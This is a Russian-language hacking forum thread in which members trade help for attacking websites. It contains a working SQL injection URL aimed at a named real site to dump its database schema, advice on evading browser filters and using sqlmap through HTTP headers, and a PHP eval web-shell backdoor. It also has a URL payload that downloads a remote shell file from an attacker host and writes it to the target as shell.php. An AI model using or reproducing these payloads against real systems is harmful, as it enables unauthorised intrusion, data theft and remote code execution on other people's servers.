Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. qwwertty

    qwwertty New Member

    Joined:
    26 Dec 2009
    Messages:
    37
    Likes Received:
    1
    Reputations:
    1
    Похоже тут точку фильтрует.
     
  2. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76

    http://sahyadhri.com/tourism/cities.php?id=-4+union(select+1,concat_ws(0x03a,table_schema,table_name,column_name),3,4,5,6,7,8,9,10,11,12,13,14+from+`information_schema`.columns)+--+
     
  3. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Может да, а может и нет.

    Только так можно ответить на подобные вопросы, где не раскрываются ни название скрипта, ни url, ни что-либо ещё...

    З.Ы. Сильно помогло ?
     
    _________________________
  4. qwwertty

    qwwertty New Member

    Joined:
    26 Dec 2009
    Messages:
    37
    Likes Received:
    1
    Reputations:
    1
    Вместо
    Code:
    sqlmap
    Используй руки.
     
    1 person likes this.
  5. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    281
    Likes Received:
    55
    Reputations:
    20
    руками не прокатывает
     
  6. Кот в сапога

    Joined:
    23 Aug 2012
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Привет! Почему я в FF делаю запрос к БД со скобками "user()" и браузер фильтрует их преобразовывая в "user #45005232991653576411" и запрос не получается. В то время через оперу все нормально.

    Как это обойти?

    ЗЫ Установил в FF хакбар, как только не кодирую серавно запрос не проходит
     
  7. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    Установи старый FF и будет тебя счастье
     
  8. Кот в сапога

    Joined:
    23 Aug 2012
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Спасибо! Но этот вариант мне известен. Неучто все тестируют изпод старых браузеров?

    Ты каким пользуешься?
     
  9. qwwertty

    qwwertty New Member

    Joined:
    26 Dec 2009
    Messages:
    37
    Likes Received:
    1
    Reputations:
    1
    http://www.cometbird.com/
     
  10. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    281
    Likes Received:
    55
    Reputations:
    20
    Как с помощью sqlmap раскрутить sqli через http заголовки? Если вбиваю --header=X-Forwarded-For: то не прокатывает... Помогите плиз. Мне надо исключительно с помощью sqlmap.
     
  11. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,185
    Likes Received:
    618
    Reputations:
    690
    поставь браузер http://getmantra.com/ и будет щястя )
     
    _________________________
  12. ldschooler

    ldschooler Banned

    Joined:
    14 Oct 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Подскажите код бэкдора на шелле?
    Чтобы строчка на eval вызывала шелл с другого сайта...
     
  13. qwwertty

    qwwertty New Member

    Joined:
    26 Dec 2009
    Messages:
    37
    Likes Received:
    1
    Reputations:
    1
    Code:
    <?php eval($_GET[cmd]); ?>
     
  14. ldschooler

    ldschooler Banned

    Joined:
    14 Oct 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    А можно на конкретном примере?
     
  15. qwwertty

    qwwertty New Member

    Joined:
    26 Dec 2009
    Messages:
    37
    Likes Received:
    1
    Reputations:
    1
    Code:
    http://target/evil.php?cmd=<пхп функция>
    http://target/evil.php?cmd=phpinfo();
    http://target/evil.php?cmd=$f=fopen($_GET[r],$_GET[rr]);$o=fopen($_GET[o],$_GET[oo]);while(!feof($f)){$row=fgets($f);fputs($o,$row);} &rr=r&oo=w+&r=http://evilsite.ru/shell.txt&o=shell.php
    Либо echo '<?php eval($_GET[\'cmd\']) ?>' > shell.php
     
    #21635 qwwertty, 22 Dec 2012
    Last edited: 22 Dec 2012
  16. ldschooler

    ldschooler Banned

    Joined:
    14 Oct 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Так и делаю, но не открывается шелл по последней строчке :(
     
  17. qwwertty

    qwwertty New Member

    Joined:
    26 Dec 2009
    Messages:
    37
    Likes Received:
    1
    Reputations:
    1
    Сохрани как txt - и посмотри что выходит.
    echo '<?php eval($_GET[\'cmd\']) ?>' > 111.txt
     
  18. ldschooler

    ldschooler Banned

    Joined:
    14 Oct 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Forbidden
    You do not have permission to access this document.
     
  19. qwwertty

    qwwertty New Member

    Joined:
    26 Dec 2009
    Messages:
    37
    Likes Received:
    1
    Reputations:
    1
    Это происходит при попытке залить шелл с таким кодом?
    Code:
    <?php eval($_GET[cmd]); ?>
    Либо на этом шаге?
    Code:
    echo '<?php eval($_GET[\'cmd\']) ?>' > 666.php
     
  20. ldschooler

    ldschooler Banned

    Joined:
    14 Oct 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Есть шелл. На шелле я создал файл php с содержимым "<?php eval($_GET[cmd]); ?>"
    Ошибка эта даже при попытке вывести phpinfo.
     
Thread Status:
Not open for further replies.